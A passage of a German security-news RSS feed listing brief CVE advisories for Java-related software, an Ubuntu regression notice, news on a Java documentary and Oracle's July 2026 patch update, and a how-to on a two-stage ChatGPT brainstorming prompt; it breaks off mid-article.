<title><![CDATA[CVE-2026-62574 | Oracle Java SE/GraalVM for JDK/GraalVM Enterprise Edition Install Local Privilege Escalation (Nessus ID 329223)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition and classified as problematic. This vulnerability affects unknown code of the component Install. The manipulation results in Local Privilege Escalation.

This vulnerability is identified as CVE-2026-62574....]]></description>
<link>https://tsecurity.de/de/3690239/sicherheitsluecken/cve-2026-62574-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-install-local-privilege-escalation-nessus-id-329223/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690239/sicherheitsluecken/cve-2026-62574-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-install-local-privilege-escalation-nessus-id-329223/</guid>
<pubDate>Thu, 23 Jul 2026 23:08:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects unknown code of the component <em>Install</em>. The manipulation results in Local Privilege Escalation.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-62574">CVE-2026-62574</a>. The attack is only possible with local access. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15687 | Kubernetes Java Client up to 25.0.0/26.0.0 Copy Directory copyDirectoryFromPod enableTarCompressing path traversal (EUVD-2026-48363)]]></title>
<description><![CDATA[A vulnerability was found in Kubernetes Java Client up to 25.0.0/26.0.0. It has been declared as critical. This affects the function copyDirectoryFromPod of the component Copy Directory. Executing a manipulation of the argument enableTarCompressing can lead to path traversal.

This vulnerability ...]]></description>
<link>https://tsecurity.de/de/3690234/sicherheitsluecken/cve-2026-15687-kubernetes-java-client-up-to-25002600-copy-directory-copydirectoryfrompod-enabletarcompressing-path-traversal-euvd-2026-48363/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690234/sicherheitsluecken/cve-2026-15687-kubernetes-java-client-up-to-25002600-copy-directory-copydirectoryfrompod-enabletarcompressing-path-traversal-euvd-2026-48363/</guid>
<pubDate>Thu, 23 Jul 2026 23:08:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/kubernetes:java_client">Kubernetes Java Client up to 25.0.0/26.0.0</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This affects the function <code>copyDirectoryFromPod</code> of the component <em>Copy Directory</em>. Executing a manipulation of the argument <em>enableTarCompressing</em> can lead to path traversal.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-15687">CVE-2026-15687</a>. It is possible to launch the attack remotely. No exploit is available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘The Java Story’ recounts the rise, fall, and rise again of Java]]></title>
<description><![CDATA[The evolution of Java is the subject of a just-released documentary about the programming language and development platform. “The Java Story: The Official Documentary” tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.



Produced...]]></description>
<link>https://tsecurity.de/de/3690140/ai-nachrichten/the-java-story-recounts-the-rise-fall-and-rise-again-of-java/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690140/ai-nachrichten/the-java-story-recounts-the-rise-fall-and-rise-again-of-java/</guid>
<pubDate>Thu, 23 Jul 2026 22:04:52 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The evolution of <a href="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html" data-type="link" data-id="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html">Java</a> is the subject of a just-released documentary about the programming language and development platform. <a href="https://inside.java/2026/07/18/the-java-documentary/">“The Java Story: The Official Documentary”</a> tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.</p>



<p class="wp-block-paragraph">Produced by <a href="https://www.youtube.com/@cultrepo">CultRepo</a> and sponsored by Oracle, JetBrains, IBM, and Azul, the documentary follows Java from its set-top box and browser-based origins at Sun Microsystems in the 1990s and through its rise to dominate server-side computing in the 2000s, the “dark ages” and resurgence with Java 8 under Oracle in the 2010s, and its continuing modernization and promising role in AI today. “From its humble beginnings as a project code-named ‘Oak’ at Sun Microsystems to becoming a global standard for enterprise software and billions of devices, Java’s journey is one of radical innovation, strategic pivots, and enduring community strength,” said Cult.Repo. </p>



<p class="wp-block-paragraph">The documentary also delves into Sun’s bitter Java licensing dispute with Microsoft, Oracle’s suit of Google over its use of Java APIs Android (Google won), the creation of the <a href="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html" data-type="link" data-id="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html">Java Community Process</a>, Sun’s open-sourcing of Java, and Oracle’s switch to the six-month release cycle. Technical enhancements such as lambda expressions in Java 8, virtual threads in Java 21 (<a href="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html" data-type="link" data-id="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html">Project Loom</a>), and the ongoing refactor to bring value objects to the Java object model (<a href="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html" data-type="link" data-id="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html">Project Valhalla</a>) also get attention. </p>



<p class="wp-block-paragraph">Technical experts and other Java figures interviewed in the documentary include James Gosling, creator of Java; Kim Polese, Java’s first product manager; Carla Schroer, director of Java compatibility at Sun Microsystems; James Duncan Davidson, creator of Apache Tomcat; Mark Reinhold, chief architect of the Java Platform Group at Oracle; Brian Goetz, Java language architect in the Java Platform Group at Oracle; Rod Johnson, creator of Spring; and Gavin King, creator of Hibernate. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ich habe ChatGPT um 100 Ideen gebeten: Darum sollten Sie das auch machen]]></title>
<description><![CDATA[Wenn Sie einen KI-Chatbot darum bitten, Namen für einen Podcast, ein WLAN-Netzwerk oder ein kleines Unternehmen zu entwickeln, werden Sie wahrscheinlich eine Liste mit Vorschlägen erhalten, die ein wenig unkreativ ist.



Große Sprachmodelle wie ChatGPT, Claude und Gemini haben kein Problem damit...]]></description>
<link>https://tsecurity.de/de/3689734/windows-tipps/ich-habe-chatgpt-um-100-ideen-gebeten-darum-sollten-sie-das-auch-machen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689734/windows-tipps/ich-habe-chatgpt-um-100-ideen-gebeten-darum-sollten-sie-das-auch-machen/</guid>
<pubDate>Thu, 23 Jul 2026 18:48:59 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Wenn Sie einen KI-Chatbot darum bitten, Namen für einen Podcast, ein WLAN-Netzwerk oder ein kleines Unternehmen zu entwickeln, werden Sie wahrscheinlich eine Liste mit Vorschlägen erhalten, die ein wenig unkreativ ist.</p>



<p>Große Sprachmodelle wie ChatGPT, Claude und Gemini haben kein Problem damit, ein Dutzend Namen für Ihr Lieblingsprojekt oder Ihre Website zu generieren. Aber ein Dutzend Namen zu erhalten, die wirklich vielfältig, einzigartig und einprägsam sind? Das ist deutlich schwieriger – aber dennoch möglich. Sie müssen nur wissen, wie Sie die Modelle auf die richtige Weise in verschiedene Richtungen lenken können.</p>



<p>Bitten Sie ChatGPT zunächst nicht nur um 10 oder 20 Ideen, sondern um 100. Eine <a href="https://mackinstitute.wharton.upenn.edu/wp-content/uploads/2024/02/for-web-AI-idea-variance.pdf">Studie der Wharton School</a> [PDF] legt nahe, dass die Ideen, wenn Sie eine KI um so viele Ideen bitten, umso interessanter werden, je weiter Sie in der Liste nach unten gehen. Dies ist der „Dump“-Teil dieser zweistufigen Prompt-Technik.</p>



<p>In der zweiten Stufe bitten Sie ChatGPT, die Liste zu durchforsten, nach ähnlichen Einträgen zu suchen und diese durch neue zu ersetzen – alles mit dem Ziel, eine möglichst breite und vielfältige Ideensammlung zu schaffen.</p>



<p>Hier ist ein Beispiel für die erste Stufe der Eingabeaufforderung:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Gib mir 100 Ideen zu [Thema X]. Nummeriere diese von 1 bis 100. Gib für jede Idee nur einen kurzen Titel oder Namen an – keine Erklärungen, keine Beschreibungen. Beziehe alles mit ein, auch offensichtliche, schlechte, seltsame oder unausgereifte Antworten. Filtere nicht nach Qualität; das folgt später. Quantität ist das einzige Ziel.</p>
</blockquote>



<p>Sobald die KI ihre Liste geliefert hat, fahren Sie mit der zweiten Phase fort:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Überarbeite nun die Liste im Hinblick auf maximale Vielfalt. Wo immer zwei oder mehr Ideen auf demselben Grundkonzept beruhen, behalte die beste davon bei und ersetze die anderen durch Ideen aus Blickwinkeln, die sonst nirgendwo auf der Liste abgedeckt sind. Das Ziel sind 100 Ideen, bei denen keine zwei auf dasselbe zugrunde liegende Konzept verweisen – sie müssen sich in ihrer Art unterscheiden, nicht nur im Wortlaut.</p>
</blockquote>



<p>Optional können Sie mit einer Eingabe für die dritte Phase fortfahren, die die KI dazu veranlasst, die Liste nach Qualität zu filtern (ich empfehle jedoch, alle 100 Ideen der zweiten Phase selbst durchzugehen):</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Was sind die 10 interessantesten Ideen auf der zweiten Liste?</p>
</blockquote>



<p>Ich habe diese „100-Ideen“-Anweisung (die ich aus einer in der oben genannten Wharton-Studie vorgestellten Anweisungskombination adaptiert habe) für einen lang gehegten Traum ausprobiert: die Eröffnung meines eigenen Cafés. Eine der größten Hürden ist natürlich die Wahl eines einfallsreichen Namens, also habe ich diese zweistufige Anweisung gestartet.</p>



<p>Ich möchte Sie nicht mit der gesamten Liste der Vorschläge langweilen, die ich erhalten habe. Aber hier sind die ersten 10 aus der ursprünglichen Auswahl:</p>



<ul class="wp-block-list">
<li>The Daily Grind</li>



<li>Bean There</li>



<li>Brewed Awakening</li>



<li>Central Perk</li>



<li>The Coffee House</li>



<li>Morning Cup</li>



<li>Java Junction</li>



<li>Common Grounds</li>



<li>Cup &amp; Bean</li>



<li>The Roasted Bean</li>
</ul>



<p>Dabei kamen die üblichen Verdächtigen heraus, bis hin zum „Central Perk“ aus der Serie <em>Friends</em>. Aber auch einige interessante Wortwitze.</p>



<p>Nach der Aufforderung der zweiten Stufe und der optionalen dritten Stufe („Nenne mir die 10 interessantesten Namen aus der zweiten Liste“) kam ich schließlich auf folgende Ergebnisse:</p>



<ul class="wp-block-list">
<li>Warm Noise</li>



<li>Morning Object</li>



<li>Public Living Room</li>



<li>Moth &amp; Match</li>



<li>Localhost</li>



<li>Borrowed Sugar</li>



<li>Unfinished Sentence</li>



<li>Blue Hour</li>



<li>The Loading Bar</li>



<li>Sunday Weather</li>
</ul>



<p>Das sind wirklich ungewöhnliche, unkonventionelle Ideen für den Namen meines zukünftigen Cafés. Einige davon sind ein wenig techniklastig („Localhost“) oder einfach nur seltsam („Morning Object“), andere hingegen haben meine Aufmerksamkeit geweckt. „Blue Hour“ und „Borrowed Sugar“ gefallen mir tatsächlich sehr gut.</p>



<p>Probieren Sie diese zweistufige „100-Ideen“-Übung doch einmal aus, wenn Sie das nächste Mal Ideen benötigen. Selbst wenn dabei nicht gleich der perfekte Name für ein Café, einen Podcast oder einen Blog herauskommt, wird sie zumindest Ihre Kreativität anregen.</p>



<p><a href="https://www.pcwelt.de/article/2806063/so-macht-chatgpt-ihren-alltag-spuerbar-leichter-16-aufgaben-rasch-erledigen-lassen.html" target="_blank" rel="noreferrer noopener">ChatGPT im Alltag – 16 lästige Aufgaben, die KI für Sie erledigen kann</a></p>



<p><a href="https://www.pcwelt.de/article/3183744/hoeren-sie-auf-chatgpt-ihre-texte-schreiben-zu-lassen-versuchen-sie-das-stattdessen.html" target="_blank" rel="noreferrer noopener">Hören Sie auf, ChatGPT Ihre Texte schreiben zu lassen – Versuchen Sie das stattdessen</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47063 | Oracle Java SE/GraalVM for JDK/GraalVM Enterprise Edition Libraries improper authorization (Nessus ID 329174)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition. It has been declared as problematic. This affects an unknown function of the component Libraries. The manipulation results in improper authorization.

This vulnerability is cataloged as CVE-2026-47063. Th...]]></description>
<link>https://tsecurity.de/de/3689730/sicherheitsluecken/cve-2026-47063-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-libraries-improper-authorization-nessus-id-329174/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689730/sicherheitsluecken/cve-2026-47063-oracle-java-segraalvm-for-jdkgraalvm-enterprise-edition-libraries-improper-authorization-nessus-id-329174/</guid>
<pubDate>Thu, 23 Jul 2026 18:46:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE, GraalVM for JDK and GraalVM Enterprise Edition</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown function of the component <em>Libraries</em>. The manipulation results in improper authorization.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-47063">CVE-2026-47063</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47057 | Oracle Java SE Scripting privileges management (Nessus ID 329174)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Oracle Java SE. The affected element is an unknown function of the component Scripting. Performing a manipulation results in improper privilege management.

This vulnerability was named CVE-2026-47057. The attack may be initi...]]></description>
<link>https://tsecurity.de/de/3689729/sicherheitsluecken/cve-2026-47057-oracle-java-se-scripting-privileges-management-nessus-id-329174/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689729/sicherheitsluecken/cve-2026-47057-oracle-java-se-scripting-privileges-management-nessus-id-329174/</guid>
<pubDate>Thu, 23 Jul 2026 18:46:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE</a>. The affected element is an unknown function of the component <em>Scripting</em>. Performing a manipulation results in improper privilege management.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-47057">CVE-2026-47057</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47058 | Oracle Java SE 8u491/8u491-perf/11.0.31 Scripting improper authorization (Nessus ID 329174)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Oracle Java SE 8u491/8u491-perf/11.0.31. The impacted element is an unknown function of the component Scripting. Executing a manipulation can lead to improper authorization.

The identification of this vulnerability is CVE-2026-47058...]]></description>
<link>https://tsecurity.de/de/3689728/sicherheitsluecken/cve-2026-47058-oracle-java-se-8u4918u491-perf11031-scripting-improper-authorization-nessus-id-329174/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689728/sicherheitsluecken/cve-2026-47058-oracle-java-se-8u4918u491-perf11031-scripting-improper-authorization-nessus-id-329174/</guid>
<pubDate>Thu, 23 Jul 2026 18:46:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 8u491/8u491-perf/11.0.31</a>. The impacted element is an unknown function of the component <em>Scripting</em>. Executing a manipulation can lead to improper authorization.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-47058">CVE-2026-47058</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60147 | Oracle GraalVM Enterprise Edition/GraalVM for JDK/Java SE Security sandbox (Nessus ID 329174)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Oracle GraalVM Enterprise Edition, GraalVM for JDK and Java SE. The affected element is an unknown function of the component Security. Such manipulation leads to sandbox issue.

This vulnerability is referenced as CVE-2026-60147. It i...]]></description>
<link>https://tsecurity.de/de/3689727/sicherheitsluecken/cve-2026-60147-oracle-graalvm-enterprise-editiongraalvm-for-jdkjava-se-security-sandbox-nessus-id-329174/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689727/sicherheitsluecken/cve-2026-60147-oracle-graalvm-enterprise-editiongraalvm-for-jdkjava-se-security-sandbox-nessus-id-329174/</guid>
<pubDate>Thu, 23 Jul 2026 18:46:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/oracle:graalvm_enterprise_edition">Oracle GraalVM Enterprise Edition, GraalVM for JDK and Java SE</a>. The affected element is an unknown function of the component <em>Security</em>. Such manipulation leads to sandbox issue.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-60147">CVE-2026-60147</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8322-2: Apache Commons BeanUtils regression]]></title>
<description><![CDATA[USN-8322-1 fixed a vulnerability in Apache Commons BeanUtils. It was
discovered that for Ubuntu 18.04 LTS, during the update preparation
phase, a previous fix for CVE-2014-0114 and CVE-2019-10086 was
incorrectly dropped. This update reintroduces the fix for
CVE-2014-0114 and CVE-2019-10086.

We a...]]></description>
<link>https://tsecurity.de/de/3689233/unix-server/usn-8322-2-apache-commons-beanutils-regression/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689233/unix-server/usn-8322-2-apache-commons-beanutils-regression/</guid>
<pubDate>Thu, 23 Jul 2026 15:53:47 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[USN-8322-1 fixed a vulnerability in Apache Commons BeanUtils. It was
discovered that for Ubuntu 18.04 LTS, during the update preparation
phase, a previous fix for CVE-2014-0114 and CVE-2019-10086 was
incorrectly dropped. This update reintroduces the fix for
CVE-2014-0114 and CVE-2019-10086.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that Apache Commons BeanUtils incorrectly allowed
 access to the declaredClass property of Java enum objects when handling
 externally supplied property paths. An attacker could possibly use this
 issue to execute arbitrary code.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3969 | OpenKM up to 6.3.11 FileUtils.java getFileExtension temp file (EUVD-2022-43301)]]></title>
<description><![CDATA[A vulnerability was found in OpenKM up to 6.3.11. It has been classified as problematic. This issue affects the function getFileExtension of the file src/main/java/com/openkm/util/FileUtils.java. This manipulation causes insecure temporary file.

This vulnerability is tracked as CVE-2022-3969. Th...]]></description>
<link>https://tsecurity.de/de/3688875/sicherheitsluecken/cve-2022-3969-openkm-up-to-6311-fileutilsjava-getfileextension-temp-file-euvd-2022-43301/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688875/sicherheitsluecken/cve-2022-3969-openkm-up-to-6311-fileutilsjava-getfileextension-temp-file-euvd-2022-43301/</guid>
<pubDate>Thu, 23 Jul 2026 13:35:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openkm">OpenKM up to 6.3.11</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects the function <code>getFileExtension</code> of the file <em>src/main/java/com/openkm/util/FileUtils.java</em>. This manipulation causes insecure temporary file.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2022-3969">CVE-2022-3969</a>. The attack is only possible within the local network. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: Java in seiner besten Form: Online-Konferenz zu effizienterer Java-Entwicklung]]></title>
<description><![CDATA[Die betterCode() Java 2026 zeigt, wie man die Änderungen der jüngsten JDKs sinnvoll nutzt, und hilft bei der KI-gestützten Softwareentwicklung in Java.]]></description>
<link>https://tsecurity.de/de/3688672/it-nachrichten/heise-angebot-java-in-seiner-besten-form-online-konferenz-zu-effizienterer-java-entwicklung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688672/it-nachrichten/heise-angebot-java-in-seiner-besten-form-online-konferenz-zu-effizienterer-java-entwicklung/</guid>
<pubDate>Thu, 23 Jul 2026 12:19:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die betterCode() Java 2026 zeigt, wie man die Änderungen der jüngsten JDKs sinnvoll nutzt, und hilft bei der KI-gestützten Softwareentwicklung in Java.]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle July 2026 Patch Fixes 1,434 CVEs Across 334 Products]]></title>
<description><![CDATA[Oracle has released its July 2026 Critical Patch Update, delivering one of its largest quarterly security releases to date. The latest Oracle security patch addresses more than 1,400 vulnerabilities across hundreds of products, with the company indicating that artificial intelligence likely playe...]]></description>
<link>https://tsecurity.de/de/3688240/it-security-nachrichten/oracle-july-2026-patch-fixes-1434-cves-across-334-products/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688240/it-security-nachrichten/oracle-july-2026-patch-fixes-1434-cves-across-334-products/</guid>
<pubDate>Thu, 23 Jul 2026 09:11:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1250" height="768" src="https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="July 2026 Critical Patch Update" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update.webp 1250w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-300x184.webp 300w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-1024x629.webp 1024w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-768x472.webp 768w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-600x369.webp 600w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-150x92.webp 150w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-750x461.webp 750w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-1140x700.webp 1140w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update.webp 1250w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-300x184.webp 300w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-1024x629.webp 1024w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-768x472.webp 768w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-600x369.webp 600w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-150x92.webp 150w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-750x461.webp 750w, https://thecyberexpress.com/wp-content/uploads/July-2026-Critical-Patch-Update-1140x700.webp 1140w" sizes="(max-width: 1250px) 100vw, 1250px" title="Oracle July 2026 Patch Fixes 1,434 CVEs Across 334 Products 1"></p><span data-contrast="auto">Oracle has released its July 2026 Critical Patch Update, delivering one of its largest quarterly security releases to date. The latest Oracle security patch addresses more than 1,400 vulnerabilities across hundreds of products, with the company indicating that artificial intelligence likely played a significant role in identifying most of the flaws.</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>

<span data-contrast="auto">According to Oracle, the July 2026 Critical Patch Update contains 1,449 security patches, covering 1,434 unique Common <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="Vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29087">Vulnerabilities</a> and Exposures (CVEs) across 334 products. </span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">July 2026 Critical Patch Update Covers Hundreds of Oracle Products</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The latest Oracle <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29089">security</a> patch spans a wide range of enterprise products and platforms. Among the affected products are Database Server, Oracle APEX, Autonomous Health Framework, Essbase, Global Lifecycle Management, GoldenGate, NoSQL Database, Spatial Studio, SQL Developer, TimesTen In-Memory Database, Application Testing Suite, Commerce, Communications, Construction and Engineering, and E-Business Suite.</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>

<span data-contrast="auto">The <a href="https://www.oracle.com/security-alerts/cpujul2026.html" target="_blank" rel="nofollow noopener">July 2026 Critical Patch Update</a> also includes security fixes for Enterprise Manager, Financial Services Applications, Food and Beverage Applications, Fusion Middleware, Analytics, HealthCare Applications, Hospitality Applications, Java SE, JD Edwards, MySQL, PeopleSoft, Retail Applications, Siebel CRM, Supply Chain, Systems, Utilities Applications, and Virtualization.</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>

<span data-contrast="auto">By addressing vulnerabilities across such an extensive product lineup, the Oracle security patch aims to reduce the risk posed by <a href="https://thecyberexpress.com/critical-security-flaw-javascript-library-vm2/" target="_blank" rel="noopener">security weaknesses</a> that could affect organizations running Oracle technologies in production environments.</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Hundreds of Vulnerabilities Can Be Exploited Remotely</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">A notable aspect of the July 2026 Critical Patch Update is the number of flaws that attackers could potentially <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="29088">exploit</a> without requiring authentication.</span>

<span data-contrast="auto">Oracle stated that roughly 600 of the patches fix vulnerabilities that can be exploited remotely by unauthenticated attackers. In addition, hundreds of the addressed security flaws have been assigned critical severity ratings, emphasizing the importance of applying the latest Oracle security patch without delay.</span>

<span data-contrast="auto">Among Oracle's products, the highest number of vulnerabilities were addressed in:</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>
<ul>
 	<li><span data-contrast="auto">E-Business Suite: 410 vulnerabilities</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span></li>
 	<li><span data-contrast="auto">Fusion Middleware: 355 vulnerabilities</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span></li>
 	<li><span data-contrast="auto">Communications: 168 vulnerabilities</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span></li>
 	<li><span data-contrast="auto">PeopleSoft: 84 vulnerabilities</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span></li>
</ul>
<span data-contrast="auto">These figures highlight that some of Oracle's most widely deployed enterprise applications received a significant share of the security fixes included in the quarterly update.</span>
<h3 aria-level="2"><b><span data-contrast="none">AI-Driven Vulnerability Discovery Appears to Have Played a Major Role</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">One of the most notable aspects of the July 2026 Critical Patch Update is Oracle's growing use of <a href="https://thecyberexpress.com/cisa-first-chief-artificial-intelligence-officer/" target="_blank" rel="noopener">artificial intelligence</a> for security research.</span>

